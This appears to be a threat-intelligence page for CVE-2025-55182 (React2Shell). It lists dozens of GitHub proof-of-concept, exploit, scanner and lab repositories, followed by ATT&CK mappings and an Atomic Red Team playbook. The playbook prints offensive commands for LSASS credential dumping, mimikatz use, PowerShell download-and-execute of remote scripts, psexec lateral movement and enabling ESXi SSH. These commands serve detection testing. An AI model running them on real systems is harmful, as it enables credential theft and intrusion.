andressuarezmonk/CVE-2025-55182
|
andressuarezmonk | 0 | 0 | 2025-12-07 | View |
|
umairahmadh/react-vuln-scanner
A bash script to scan your server for React applications vulnerable to **CVE-2025-55182** — a critical remote code execu...
|
umairahmadh | 0 | 0 | 2025-12-07 | View |
|
satriarizka/CVE-2025-55182-Simple-Scanner
High-fidelity RCE scanner for CVE-2025-55182 affecting Next.js RSC. Supports mass scanning, command execution, and autom...
|
satriarizka | 0 | 0 | 2025-12-07 | View |
|
DoobTheGoober/CVE-2025-55182-Test-Server
Play with react2shell in a safe environment!
|
DoobTheGoober | 0 | 0 | 2025-12-07 | View |
|
lalaterry/CVE-2025-55182-React2Shell-lab
|
lalaterry | 0 | 0 | 2025-12-08 | View |
|
lincemorado97/CVE-2025-55182_CVE-2025-66478
CVE-2025-55182 + CVE-2025-66478 - Next.js/React Server Components Remote Code Execution
|
lincemorado97 | 0 | 0 | 2025-12-08 | View |
|
wangzhengquan/CVE-2025-55182
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
|
wangzhengquan | 0 | 0 | 2025-12-08 | View |
|
TH-SecForge/CVE-2025-55182
|
TH-SecForge | 0 | 0 | 2025-12-08 | View |
|
chitoz1300/React2Shell-CVE-2025-55182
* React2Shell-CVE-2025-55182
|
chitoz1300 | 0 | 0 | 2025-12-08 | View |
|
thekamran/CVE-2025-55182-Proof-of-Concept
|
thekamran | 0 | 0 | 2025-12-08 | View |
|
randarts/react-rce
CVE-2025-55182 취약점에 대한 샘플을 AI와 함께 작성 및 테스트 했습니다.
|
randarts | 0 | 0 | 2025-12-08 | View |
|
Macaroniwdcheese/CVE-2025-55182-Lab
|
Macaroniwdcheese | 0 | 0 | 2025-12-08 | View |
|
LvMalware/CVE-2025-55182
Exploit for CVE-2025-55182 (React4Shell)
|
LvMalware | 0 | 0 | 2025-12-08 | View |
|
MaxK9999/CVE-2025-55182
|
MaxK9999 | 0 | 0 | 2025-12-06 | View |
|
7amzahard/React2shell
CVE-2025-55182
|
7amzahard | 0 | 0 | 2025-12-08 | View |
|
yaupunal/CVE-2025-55182-scanner
CVE-2025-55182-scanner with 2 different method
|
yaupunal | 0 | 0 | 2025-12-08 | View |
|
jandelima/cve-2025-55182-poc-test
|
jandelima | 0 | 0 | 2025-12-08 | View |
|
slreaperking/CVE-2025-55182-poc
🚨 Demonstrate CVE-2025-55182, a critical React vulnerability allowing remote code execution via prototype chain pollutio...
|
slreaperking | 0 | 0 | 2025-12-24 | View |
|
lowercasenumbers/CVE-2025-55182
CVE-2025-55182 React2Shell PoC
|
lowercasenumbers | 0 | 0 | 2025-12-08 | View |
|
LQTjim/next-bug-CVE-2025-55182
|
LQTjim | 0 | 0 | 2025-12-08 | View |
|
AliAbdollahiii/react2shell_detector
Heuristic security scanner for detecting React Server Components (RSC) vulnerabilities, including React2Shell-style beha...
|
AliAbdollahiii | 0 | 0 | 2025-12-08 | View |
|
MoisesTapia/http-react2shell
Detection of the React Server Actions Exploit vector – CVE-2025-55182 / CVE-2025-66478
|
MoisesTapia | 0 | 0 | 2025-12-09 | View |
|
solidevil14/Suricata-Rule-for-Detecting-CVE-2025-55182
CVE‑2025‑55182 Detection
|
solidevil14 | 0 | 0 | 2025-12-09 | View |
|
iamblacksolo2-BugBounty/POC-CVE-2025-55182
|
iamblacksolo2-BugBounty | 0 | 0 | 2025-12-09 | View |
|
DevVaibhav07/POC-CVE-2025-55182
POC-CVE-2025-55182
|
DevVaibhav07 | 0 | 0 | 2025-12-09 | View |
|
liamromanis101/cve-2025-55182
Python3 script that can be used to demonstrate **CVE-2025-55182**. It exploits a server-side JavaScript injection vulner...
|
liamromanis101 | 0 | 0 | 2025-12-09 | View |
|
ysfcndgr/React2Shell-CVE-2025-55182-Advanced-Scanner
|
ysfcndgr | 0 | 0 | 2025-12-09 | View |
|
eytannatye/R2S_CVE-2025-55182
|
eytannatye | 0 | 0 | 2025-12-09 | View |
|
Jaycelation/CVE-2025-55182
PoC, Hunting React2Shell about CVE-2025-55182
|
Jaycelation | 0 | 0 | 2025-12-09 | View |
|
Stonelinks/react-cve-2025-55182
malware I found on my server
|
Stonelinks | 0 | 0 | 2025-12-09 | View |
|
trax69/cve-2025-55182-poc
Proof of Concept for CVE-2025-55182 ("React2Shell"). A fully dockerized environment demonstrating Remote Code Execution ...
|
trax69 | 0 | 0 | 2025-12-09 | View |
|
osman-butt/CVE-2025-55182-demo
Demo of CVE-2025-55182 — Next.js RCE (for educational purposes)
|
osman-butt | 0 | 0 | 2025-12-09 | View |
|
iamblacksolo2-BugBounty/POC2-CVE-2025-55182
|
iamblacksolo2-BugBounty | 0 | 0 | 2025-12-10 | View |
|
gunyakit/CVE-2025-55182-PoC-exploit
Next.js RCE via React Server Functions
|
gunyakit | 0 | 0 | 2025-12-10 | View |
|
CrazyloveforWeb/Golang-CVE-2025-55182-POC
|
CrazyloveforWeb | 0 | 0 | 2025-12-10 | View |
|
rahul-securify/React2Shell-CVE-2025-55182
|
rahul-securify | 0 | 0 | 2025-12-12 | View |
|
ryanhafid/PoC_CVE-2025-55182
|
ryanhafid | 0 | 0 | 2025-12-12 | View |
|
ryanhafid/Scan_CVE-2025-55182
|
ryanhafid | 0 | 0 | 2025-12-12 | View |
|
Kugelbyte/React2Shell-Analysis
A research report on CVE-2025-55182 (React2Shell).
|
Kugelbyte | 0 | 0 | 2025-12-13 | View |
|
dhananjayakumarn/CVE-2025-55182-Lab
A hands-on lab for understanding and exploiting CVE-2025-55182 (React2Shell) - Remote Code Execution in React Server Com...
|
dhananjayakumarn | 0 | 0 | 2025-12-13 | View |
|
ZorvithonLeo-Null/CVE-2025-55182-exploit
|
ZorvithonLeo-Null | 0 | 0 | 2025-12-13 | View |
|
tinashelorenzi/CVE-2025-55182
|
tinashelorenzi | 0 | 0 | 2025-12-14 | View |
|
CyberPrince-hub/React2shell-ultimate-scanner
CVE-2025-55182-Advanced-Scanner is an automated security tool designed to detect and validate the CVE-2025-55182 vulnera...
|
CyberPrince-hub | 0 | 0 | 2025-12-14 | View |
|
Call123X/-cve-2025-55182
cve-2025-55182
|
Call123X | 0 | 0 | 2025-12-15 | View |
|
simantchaudhari/CVE-2025-55182
|
simantchaudhari | 0 | 0 | 2025-12-15 | View |
|
nulltrace1336/CVE-2025-55182-Metasploit-exploit-skeleton-real-flow-
Quyida to‘liq LAB rejasi: demo-vulnerable app → Python PoC → Metasploit exploit skeleton
|
nulltrace1336 | 0 | 0 | 2025-12-16 | View |
|
r4j3sh-com/CVE-2025-55182
Lightweight Go toolkit plus a Dockerized Next.js lab to explore and triage CVE-2025-55182.
|
r4j3sh-com | 0 | 0 | 2025-12-18 | View |
|
niokagi/react-cve-2025-55182
Test & Analyze the CVE-2025-55182 vulnerability within Next.js Server Actions
|
niokagi | 0 | 0 | 2025-12-21 | View |
|
knightwolf01/React2Shell
React2Shell Critical Vulnerability (CVE-2025-55182)
|
knightwolf01 | 0 | 0 | 2025-12-22 | View |
|
ckex/test-vuln
a controlled environment to test CVE-2025-55182.
|
ckex | 0 | 0 | 2025-12-23 | View |
|
Farhan9488/CVE-2025-55182-research
🛡️ Explore CVE-2025-55182, a critical RCE vulnerability in React's Flight Protocol, demonstrating exploitation technique...
|
Farhan9488 | 0 | 0 | 2025-12-24 | View |
|
Jakelife/HACKVISER-CVE-2025-55182-LAB
|
Jakelife | 0 | 0 | 2025-12-25 | View |
|
thqxploit666/CVE-2025-55182
|
thqxploit666 | 0 | 0 | 2025-12-26 | View |
|
0xROI/CVE-2025-55182
Exploitation script for CVE-2025-55182. This is modified only for my personal use. If you are facing any problem fix it ...
|
0xROI | 0 | 0 | 2025-12-26 | View |
|
KingHacker353/R2C-CVE-2025-55182-66478
|
KingHacker353 | 0 | 0 | 2025-12-27 | View |
|
amirali-ramezani/react2shell-CVE-2025-55182-
|
amirali-ramezani | 0 | 0 | 2025-12-29 | View |
|
git0xLai/React2ShellPoC
This repository provides a proof-of-concept for CVE-2025-55182 (React2Shell), a remote code execution vulnerability in R...
|
git0xLai | 0 | 0 | 2025-12-30 | View |
|
hndko/react2shell-rce-autobot
🎯 Automated vulnerability scanner for React2Shell RCE - Google dorking + safe detection for CVE-2025-55182/CVE-2025-6647...
|
hndko | 0 | 0 | 2025-12-30 | View |
|
ghostn4444/CVE-2025-55182
CVE-2025-55182 - Tool React2Shell
|
ghostn4444 | 0 | 0 | 2026-01-02 | View |
|
HackIndex-io/React2Shell-CVE-2025-55182
A HackIndex.io sandbox environment for the React2Shell vulnerability.
|
HackIndex-io | 0 | 0 | 2026-01-02 | View |
|
joaovicdev/EXPLOIT-CVE-2025-55182
|
joaovicdev | 0 | 0 | 2026-01-04 | View |
|
gahoole77/gahoole77.github.io
🔍 Discover and scan vulnerable Next.js instances to protect your infrastructure from critical RCE vulnerabilities like C...
|
gahoole77 | 0 | 0 | 2026-01-04 | View |
|
hyan0116/Next.js-RCE-CVE-2025-55182
next.js rce exploit
|
hyan0116 | 0 | 0 | 2026-01-05 | View |
|
MyCompanyOrganization/React2Shell-Kingdom
"Once upon a time, the Castle of Reactland trusted all Flight messages... until The Imposter arrived." A storytelling CV...
|
MyCompanyOrganization | 0 | 0 | 2026-01-06 | View |
|
yannisduvignau/react2shell-exploit
CVE-2025-55182, also known as React2Shell, is a critical vulnerability affecting Next.js applications using React Server...
|
yannisduvignau | 0 | 0 | 2026-01-06 | View |
|
en0f/CVE-2025-55182-poc-json
CVE-2025-55182-poc-json
|
en0f | 0 | 0 | 2026-01-07 | View |
|
termireum/react2shell
React2Shell is a high-performance vulnerability scanner written in Go, specifically designed to detect Server-Side Remot...
|
termireum | 0 | 0 | 2026-01-12 | View |
|
dbwlsdnr95/CVE-2025-55182
|
dbwlsdnr95 | 0 | 0 | 2025-12-20 | View |
|
Least-Significant-Bit/CVE-2025-55182
Remote code execution for React Server Components 19.0.0 - 19.2.0
|
Least-Significant-Bit | 0 | 0 | 2026-01-13 | View |
|
faisha1311/React2Shell-CVE-2025-55182-TryHackMe
|
faisha1311 | 0 | 0 | 2026-01-16 | View |
|
BBD-YZZ/CVE-2025-55182
CVE-2025-55182(命令执行、反弹shell、注入内存马)
|
BBD-YZZ | 0 | 0 | 2026-01-20 | View |
|
Vladjrfhfg/React-site-CVE-2025-55182
|
Vladjrfhfg | 0 | 0 | 2026-01-20 | View |
|
Namsom007/CVE-2025-55182-Exploit
CVE-2025-55182 React Server Components Remote Code Execution Exploit Lab
|
Namsom007 | 0 | 0 | 2026-01-20 | View |
|
deepankarkumar1/CVE-2025-55182_Vulnerable-Application
|
deepankarkumar1 | 0 | 0 | 2026-01-29 | View |
|
wnaspy/CVE-2025-55182
React2shell exploit (CVE-2025-55182+CVE-2025-66478)
|
wnaspy | 0 | 0 | 2026-01-31 | View |
|
Kryptopacy/Next.js-RCE-Patcher--CVE-2025-55182-
|
Kryptopacy | 0 | 0 | 2025-12-06 | View |
|
atiilla/CVE-2025-55182
RCE on Next 16.0.6
|
atiilla | 0 | 0 | 2026-02-10 | View |
|
BakhodiribnYashinibnMansur/CVE-2025-55182
|
BakhodiribnYashinibnMansur | 0 | 0 | 2025-12-10 | View |
|
BIG02-bot/React2Shell-CVE-2025-55182-An-lise-T-cnica
|
BIG02-bot | 0 | 0 | 2026-02-13 | View |
|
luoqichen/CVE-2025-55182-POC
|
luoqichen | 0 | 0 | 2026-03-06 | View |
|
lutraat/CVE-2025-55182-React-RSC-Exploit
Basic Proof of Concept (Poc) Exploit for React RSC - CVE-2025-55182
|
lutraat | 0 | 0 | 2026-03-12 | View |
|
monarchfish/cve-2025-55182-poc
Proof-of-concept for CVE-2025-55182 (React2Shell): unauthenticated RCE in React Server Components / Next.js via Flight p...
|
monarchfish | 0 | 0 | 2026-03-17 | View |
|
vick333-peniel/vick333-peniel.github.io
🛠️ Exploit CVE-2025-55182 with this GUI tool for vulnerability detection, command execution, and shell access on Windows...
|
vick333-peniel | 0 | 0 | 2025-08-06 | View |
|
nexxp90/CVE-2025-55182_RCE_Exploit
REC Exploit is a Python-based security testing tool that automates detection of potential RCE conditions in web applicat...
|
nexxp90 | 0 | 0 | 2026-03-17 | View |
|
RyosukeDTomita/CVE-2025-55182
CVE-2025-55182 — React2Shell
|
RyosukeDTomita | 0 | 0 | 2026-03-24 | View |
|
eagle-nett/React2Shell-PoC-CVE-2025-55182
Khai thác lỗ hổng bảo mật CVE-2025-55182
|
eagle-nett | 0 | 0 | 2026-03-24 | View |
|
0x0asif/CVE-2025-55182
|
0x0asif | 0 | 0 | 2026-03-29 | View |
|
porsellaj/cve-2025-55182-react2shell-analysis
Technical analysis of CVE-2025-55182 (React2Shell RCE vulnerability)
|
porsellaj | 0 | 0 | 2026-04-04 | View |
|
ogpourya/CVE-2025-55182
Interactive shell exploitation for CVE-2025-55182
|
ogpourya | 0 | 0 | 2025-12-06 | View |
|
TamaGorengs/react2shell-poc-CVE-2025-55182
|
TamaGorengs | 0 | 0 | 2025-12-20 | View |
|
sobuj0007/Nextjs_RCE_Exploit_Tool
🔍 Exploit CVE-2025-55182 in Next.js with this versatile tool for security research, featuring advanced payloads and WAF ...
|
sobuj0007 | 0 | 0 | 2025-12-25 | View |
|
shibaaa204/React2Shell
Poc for React2Shell CVE-2025-55182
|
shibaaa204 | 0 | 0 | 2026-04-24 | View |
|
DeDnY/CVE-2025-55182-in-docker
CVE-2025-55182-in-docker
|
DeDnY | 0 | 0 | 2026-03-03 | View |
|
ducducuc111/CVE-2025-55182-poc
|
ducducuc111 | 0 | 0 | 2025-12-04 | View |
|
dissy123/cve-2025-55182
|
dissy123 | 0 | 0 | 2025-12-04 | View |
|
Chelsea486MHz/CVE-2025-55182-test
See if your endpoint could be vulnerable.
|
Chelsea486MHz | 0 | 0 | 2025-12-04 | View |
|
carlosaruy/CVE-2025-55182
a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC). It also includes a realistic "Lab...
|
carlosaruy | 0 | 0 | 2025-12-04 | View |
|
0xPThree/cve-2025-55182
|
0xPThree | 0 | 0 | 2025-12-04 | View |
|
im-hanzou/CVE-2025-55182-POC-SCANNER
Unified Security Research Tool
|
im-hanzou | 0 | 0 | 2025-12-04 | View |
|
klassiker/CVE-2025-55182
|
klassiker | 0 | 0 | 2025-12-04 | View |
|
ps-interactive/cve-2025-55182
Vulnerable REACT app in docker container and poc code - for demos
|
ps-interactive | 0 | 0 | 2025-12-04 | View |
|
aquinn-r7/CVE-2025-55182-VulnCheckPOC
Functional Python POC to test if servers are vulnerable to CVE-2025-55182
|
aquinn-r7 | 0 | 0 | 2025-12-04 | View |
|
sherlocksecurity/CVE-2025-55182-Exploit-scanner
|
sherlocksecurity | 0 | 0 | 2025-12-05 | View |
|
Darker-Ink/react-ssr-vulnerability
This is a POC script for CVE-2025-55182 (React SSR RCE)
|
Darker-Ink | 0 | 0 | 2025-12-05 | View |
|
topstar88/CVE-2025-55182
|
topstar88 | 0 | 0 | 2025-12-05 | View |
|
selectarget/CVE-2025-55182-Exploit
|
selectarget | 0 | 0 | 2025-12-05 | View |
|
younesZdDz/CVE-2025-55182
|
younesZdDz | 0 | 0 | 2025-12-05 | View |
|
ngvcanh/CVE-2025-55182-Attack-Analysis
Real-world attack analysis of CVE-2025-55182 (React2Shell) - React Server Components RCE vulnerability
|
ngvcanh | 0 | 0 | 2025-12-05 | View |
|
Golden-Secure/CVE-2025-55182
Interactive RCE Web Shell (CVE-2025-55182) BY Golden-Security
|
Golden-Secure | 0 | 0 | 2025-12-05 | View |
|
alexandre-briongos-wavestone/react-cve-2025-55182-lab
|
alexandre-briongos-wavestone | 0 | 0 | 2025-12-05 | View |
|
prestonhashworth/cve-2025-55182
|
prestonhashworth | 0 | 0 | 2025-12-05 | View |
|
nomorebreach/POC-CVE-2025-55182
POC for CVE-2025-55182 React2Shell
|
nomorebreach | 0 | 0 | 2025-12-05 | View |
|
nerium-security/CVE-2025-55182
Host-based detection rules for the RCE vulnerability in the React JavaScript framework.
|
nerium-security | 0 | 0 | 2025-12-05 | View |
|
zessu/CVE-2025-55182-Typescript
Show case CVE-2025-55182 POC in Typrescript/Javascript
|
zessu | 0 | 0 | 2025-12-05 | View |
|
mxm0z/r2s
A web-based vulnerability scanner for CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability in React Serv...
|
mxm0z | 0 | 0 | 2025-12-05 | View |
|
NathanJ60/react2shell-interactive
CVE-2025-55182 Interactive PoC - React Server Components RCE - Educational Security Research
|
NathanJ60 | 0 | 0 | 2025-12-05 | View |
|
ilixm/PoC-RCE-CVE-2025-55182
|
ilixm | 0 | 0 | 2025-12-09 | View |
|
oguri-souhei/CVE-2025-55182
CVE-2025-55182 の検証用
|
oguri-souhei | 0 | 0 | 2025-12-12 | View |
|
hulh122/CVE-2025-55182
|
hulh122 | 0 | 0 | 2025-12-15 | View |
|
amikanev/CVE-2025-55182-LAB
|
amikanev | 0 | 0 | 2026-03-30 | View |
|
pitufo1721/CVE-2025-55182-GodzillaMemoryShell
|
pitufo1721 | 0 | 0 | 2023-07-07 | View |
|
fankh/cve-2025-55182-test-lab-windows
|
fankh | 0 | 0 | 2025-12-06 | View |
|
vyvivekyadav04/RSC-Infra-Scanner
This is a fast, asynchronous Python tool that fingerprints domains for likely Next.js App Router / React Server Componen...
|
vyvivekyadav04 | 0 | 0 | 2025-12-06 | View |
|
robbin0919/CVE-2025-55182
|
robbin0919 | 0 | 0 | 2025-12-07 | View |
|
FurkanKAYAPINAR/React-Next-Scanner
CVE-2025-55182 and CVE-2025-66478
|
FurkanKAYAPINAR | 0 | 0 | 2025-12-08 | View |
|
Goultarde/CVE-2025-55182-React2Shell-Lab
|
Goultarde | 0 | 0 | 2025-12-31 | View |
|
byte16384/CVE-2025-55182
proof
|
byte16384 | 0 | 0 | 2025-12-09 | View |
|
mooowu/cve-2025-55182-poc
|
mooowu | 0 | 0 | 2026-01-10 | View |
|
H4R335HR/reactshell
Interactive shell client for React Server Components RCE exploitation via __proto__ pollution (CVE-2025-55182)
|
H4R335HR | 0 | 0 | 2026-02-17 | View |
|
amir-malek/react-cve-2025-55182
|
amir-malek | 0 | 0 | 2025-12-09 | View |
|
Legus-Yeung/CVE-2025-55182-exploit
|
Legus-Yeung | 0 | 0 | 2025-12-10 | View |
|
DanielXavierJob/-CVE-2025-55182
|
DanielXavierJob | 0 | 0 | 2025-12-10 | View |
|
nanwinata/CVE-2025-55182-Scanner
|
nanwinata | 0 | 0 | 2025-12-05 | View |
|
sponte/nextjs-cve-version-confusion
Reproduction for Next.js CVE-2025-55182 version string confusion issue
|
sponte | 0 | 0 | 2025-12-10 | View |
|
J4ck3LSyN-Gen2/CVE-2025-55182
A simple toolkit to validate, exploit & gain an interactive shell via the react2Shell Next.js RCE.
|
J4ck3LSyN-Gen2 | 0 | 0 | 2025-12-10 | View |
|
min8282/CVE-2025-55182
|
min8282 | 0 | 0 | 2025-12-11 | View |
|
exrienz/CVE-2025-55182-NextJS-Scanner-React2Shell-PoC
|
exrienz | 0 | 0 | 2025-12-11 | View |
|
yuta3003/CVE-2025-55182
|
yuta3003 | 0 | 0 | 2025-12-12 | View |
|
degenwithheart/React2Shell-Vulnerability-Verification-Script
React2Shell Vulnerability Verification Script (React2Shell also known as CVE-2025-55182).
|
degenwithheart | 0 | 0 | 2025-12-18 | View |
|
StillSoul/CVE-2025-55182
A critical-severity vulnerability in React Server Components (CVE-2025-55182) affects React 19 and frameworks that use i...
|
StillSoul | 0 | 0 | 2025-12-06 | View |
|
lee191/CVE-2025-55182
|
lee191 | 0 | 0 | 2025-12-08 | View |
|
ahmedshamsddin/CVE-2025-55182
|
ahmedshamsddin | 0 | 0 | 2025-12-07 | View |
|
revasec/CVE-2025-55182-Interactive-mode
|
revasec | 0 | 0 | 2026-02-25 | View |
|
vick333-peniel/ReactExploitGUI
🛠️ Exploit CVE-2025-55182 effortlessly with this GUI tool for vulnerability detection, command execution, and Shell reve...
|
vick333-peniel | 0 | 0 | 2025-04-21 | View |
|
toprak-t800/CVE-2025-55182
|
toprak-t800 | 0 | 0 | 2026-04-04 | View |
|
Ghost121111/Blackash-CVE-2025-55182
🚨 Identify and address CVE-2025-55182, a critical React Server vulnerability allowing remote code execution without auth...
|
Ghost121111 | 0 | 0 | 2025-12-24 | View |
|
9988700/CVE-2025-55182-POC-NEXTJS
⚡ Discover and exploit CVE-2025-55182 with this PoC, offering reliable remote code execution tests for React Server Comp...
|
9988700 | 0 | 0 | 2025-12-26 | View |
|
Asder10/asder10.github.io
🛠️ Exploit CVE-2025-55182 using React2Shell, an advanced framework for Next.js and React remote code execution. Secure y...
|
Asder10 | 0 | 0 | 2026-01-08 | View |
|
W41T3D3V1L/COMPLETE-CVE-2025-55182
|
W41T3D3V1L | 0 | 0 | 2025-12-12 | View |
|
dajneem23/CVE-2025-55182
|
dajneem23 | 0 | 0 | 2025-12-19 | View |
|
ethicalrohitt/React2Shell_cve-2025-55182
|
ethicalrohitt | 0 | 0 | 2025-12-07 | View |
|
foodmen2111/test-cve-2025-55182
Thực hiện để test CVE 2025 55182
|
foodmen2111 | 0 | 0 | 2025-12-09 | View |
|
garux-sec/PoC-react2shell-CVE-2025-55182
PoC-react2shell-CVE-2025-55182
|
garux-sec | 0 | 0 | 2025-12-09 | View |
|
Ankitspandey07/React2Shell
CVE-2025-55182-advanced-scanner
|
Ankitspandey07 | 0 | 0 | 2025-12-09 | View |
|
Sotatek-KhaiNguyen3/CVE-2025-55182
|
Sotatek-KhaiNguyen3 | 0 | 0 | 2025-12-10 | View |
|
gonaumov/cve-2025-55182-checker
A portable Bash script to detect vulnerable versions of React Server DOM and Next.js packages affected by [CVE-2025-5518...
|
gonaumov | 0 | 0 | 2025-12-10 | View |
|
aseemyash/krle
CVE-2025-55182 & CVE-2025-66478 proof of concepts
|
aseemyash | 0 | 0 | 2025-12-11 | View |
|
4nuxd/React2Shell
R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulner...
|
4nuxd | 0 | 0 | 2025-12-11 | View |
|
Shadowroot97/React2Shell-CVE-2025-55182
POC React2Shell-CVE-2025-55182
|
Shadowroot97 | 0 | 0 | 2025-12-12 | View |
|
premdanav/react2shelldemo
This repo contains the scripts you can execute to simulate the (CVE-2025-55182) along with next.js server
|
premdanav | 0 | 0 | 2025-12-15 | View |
|
faizdotid/rust-cve-2025-55182
|
faizdotid | 0 | 0 | 2025-12-08 | View |
|
itumo-arigatone/study-CVE-2025-55182
試してみるよん
|
itumo-arigatone | 0 | 0 | 2025-12-16 | View |
|
trilogy-group/react2shell-scan
React2Shell (CVE-2025-55182) scanner
|
trilogy-group | 0 | 0 | 2025-12-11 | View |
|
scumfrog/FiberBreak
React2Shell Exploitation Tool (CVE-2025-55182)
|
scumfrog | 0 | 0 | 2025-12-16 | View |
|
S-Mughal/NextJS-app-CVE-2025-55182
|
S-Mughal | 0 | 0 | 2025-12-16 | View |
|
d0cnull/nextjs-CVE-2025-55182
|
d0cnull | 0 | 0 | 2025-12-16 | View |
|
Evillm/CVE-2025-55182-PoC
|
Evillm | 0 | 0 | 2026-02-04 | View |
|
Mustafa1p/Next.js-RCE-Scanner---CVE-2025-55182-CVE-2025-66478
An advanced vulnerability scanner for detecting **CVE-2025-55182** and **CVE-2025-66478** - critical Remote Code Executi...
|
Mustafa1p | 0 | 0 | 2025-12-16 | View |
|
rashedhasan090/cve-2025-55182-mitigator
|
rashedhasan090 | 0 | 0 | 2025-12-18 | View |
|
MeGaNeKoS/secure-by-default-rce-demo
Secure-by-default demo lab showing how container hardening (distroless images, non-root, read-only filesystem, runtime-i...
|
MeGaNeKoS | 0 | 0 | 2025-12-20 | View |
|
bigbluewhale111/CVE-2025-55182-LAB
This is a lab for reproducing CVE-2025-55182.
|
bigbluewhale111 | 0 | 0 | 2025-12-24 | View |
|
notkittenn/poc_react2shell
py script proof of concept new CVE-2025-55182 based in lachlan2k script
|
notkittenn | 0 | 0 | 2025-12-10 | View |
|
grejh0t/CVE-2025-55182
|
grejh0t | 0 | 0 | 2025-12-13 | View |
|
androidteacher/REACT-CVE-2025-55182-Lab
Lab with PoC
|
androidteacher | 0 | 0 | 2026-02-26 | View |
|
hujiaozhuzhu/CVE-2025-55182_liyon
CVE-2025-55182
|
hujiaozhuzhu | 0 | 0 | 2026-04-02 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
